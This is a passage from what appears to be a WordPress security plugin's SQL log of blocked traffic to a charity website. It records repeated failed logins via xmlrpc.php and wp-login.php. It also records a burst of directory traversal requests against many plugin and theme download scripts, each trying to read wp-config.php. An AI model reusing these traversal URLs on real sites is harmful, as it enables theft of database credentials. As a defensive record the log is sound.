.',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6705,0.000000,1629500245.685020,'\0\0\0\0\0\0\0\0\0\0��`}��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6706,0.000000,1629501154.257601,'\0\0\0\0\0\0\0\0\0\0��gZ�j',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6707,0.000000,1629502060.641937,'\0\0\0\0\0\0\0\0\0\0����dl',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6708,0.000000,1629502348.213541,'\0\0\0\0\0\0\0\0\0\0���(%�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(6709,0.000000,1629502997.017234,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6710,0.000000,1629503903.789305,'\0\0\0\0\0\0\0\0\0\0��o]5�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6711,0.000000,1629503956.522974,'\0\0\0\0\0\0\0\0\0\0��g�H�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','loginFailValidUsername',NULL,NULL),(6712,0.000000,1629504859.022137,'\0\0\0\0\0\0\0\0\0\0���_l',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6713,0.000000,1629505573.733103,'\0\0\0\0\0\0\0\0\0\0��/� ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(6714,0.000000,1629505853.469988,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6715,0.000000,1629506843.961050,'\0\0\0\0\0\0\0\0\0\0��/�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6716,0.000000,1629507190.448207,'\0\0\0\0\0\0\0\0\0\0��.��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','loginFailValidUsername',NULL,NULL),(6717,0.000000,1629507846.049637,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6718,0.000000,1629508815.016034,'\0\0\0\0\0\0\0\0\0\0��իо',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','loginFailValidUsername',NULL,NULL),(6719,0.000000,1629508908.627657,'\0\0\0\0\0\0\0\0\0\0���Vw�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6720,0.000000,1629509902.977483,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6721,0.000000,1629510954.455079,'\0\0\0\0\0\0\0\0\0\0��\\>cc',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6722,1629511385.788353,1629511385.465300,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://equalitywalk.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6723,1629511385.322945,1629511385.016500,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://equalitywalk.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6724,0.000000,1629513137.753970,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6725,0.000000,1629513693.874481,'\0\0\0\0\0\0\0\0\0\0��t˻�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6726,0.000000,1629514254.981089,'\0\0\0\0\0\0\0\0\0\0���5�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6727,0.000000,1629515331.383530,'\0\0\0\0\0\0\0\0\0\0���n��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6728,0.000000,1629515387.077130,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6729,0.000000,1629516516.358452,'\0\0\0\0\0\0\0\0\0\0����jQ',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6730,0.000000,1629516965.682116,'\0\0\0\0\0\0\0\0\0\0��Y`Z}',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','loginFailValidUsername',NULL,NULL),(6731,0.000000,1629517695.479110,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6732,0.000000,1629519171.079605,'\0\0\0\0\0\0\0\0\0\0��>��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(6733,0.000000,1629519481.627507,'\0\0\0\0\0\0\0\0\0\0��Kw�\r',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6734,0.000000,1629520728.130204,'\0\0\0\0\0\0\0\0\0\0��g/<,',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6735,0.000000,1629522024.116327,'\0\0\0\0\0\0\0\0\0\0���;N�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6736,0.000000,1629522487.510311,'\0\0\0\0\0\0\0\0\0\0��.est',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6737,0.000000,1629523318.404364,'\0\0\0\0\0\0\0\0\0\0��B�|',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6738,0.000000,1629524150.950209,'\0\0\0\0\0\0\0\0\0\0���s',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','loginFailValidUsername',NULL,NULL),(6739,0.000000,1629524661.832121,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6740,0.000000,1629525794.728257,'\0\0\0\0\0\0\0\0\0\0��QX4r',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6741,0.000000,1629526040.519832,'\0\0\0\0\0\0\0\0\0\0����8',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6742,0.000000,1629527236.230972,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6743,0.000000,1629527461.768749,'\0\0\0\0\0\0\0\0\0\0����\"E',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','loginFailValidUsername',NULL,NULL),(6744,0.000000,1629528033.493064,'\0\0\0\0\0\0\0\0\0\0���Y�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6745,0.000000,1629528654.133550,'\0\0\0\0\0\0\0\0\0\0���YcD',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6746,0.000000,1629529127.414016,'\0\0\0\0\0\0\0\0\0\0���}7�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','loginFailValidUsername',NULL,NULL),(6747,0.000000,1629529304.531511,'\0\0\0\0\0\0\0\0\0\0���7�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6748,0.000000,1629529943.552312,'\0\0\0\0\0\0\0\0\0\0��{+�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6749,0.000000,1629530540.766053,'\0\0\0\0\0\0\0\0\0\0����8',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6750,0.000000,1629530815.780103,'\0\0\0\0\0\0\0\0\0\0��_�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6751,0.000000,1629531166.880371,'\0\0\0\0\0\0\0\0\0\0��e�8',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6752,1629531230.206401,1629531229.927600,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6753,1629531226.048322,1629531225.677100,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6754,1629531250.672121,1629531250.369700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6755,1629531246.830946,1629531246.558200,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6756,1629531238.319229,1629531238.013000,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6757,1629531275.884781,1629531275.626000,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6758,1629531311.640170,1629531311.367700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6759,1629531306.744861,1629531306.474900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6760,1629531302.033307,1629531301.771600,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6761,1629531297.597071,1629531297.243600,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6762,1629531293.211015,1629531292.943000,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6763,1629531288.399544,1629531288.100500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6764,1629531284.312474,1629531284.004700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6765,1629531331.054519,1629531330.787100,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=...%2F.%2F...%2F.%2F...%2F.%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF9maWxlXQ==\",\"paramValue\":\"Li4uLy4vLi4uLy4vLi4uLy4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLXNpbXBsaWZpZWQtZm9yLW9hcC1tZW1iZXJzLW9ubHkvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6766,1629531326.187095,1629531325.864900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6767,1629531321.905399,1629531321.628800,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6768,0.000000,1629532375.526271,'\0\0\0\0\0\0\0\0\0\0��gZ�j',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6769,0.000000,1629532448.846384,'\0\0\0\0\0\0\0\0\0\0��_�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(6770,0.000000,1629532975.608961,'\0\0\0\0\0\0\0\0\0\0��A<�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6771,0.000000,1629533577.227707,'\0\0\0\0\0\0\0\0\0\0�����[',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 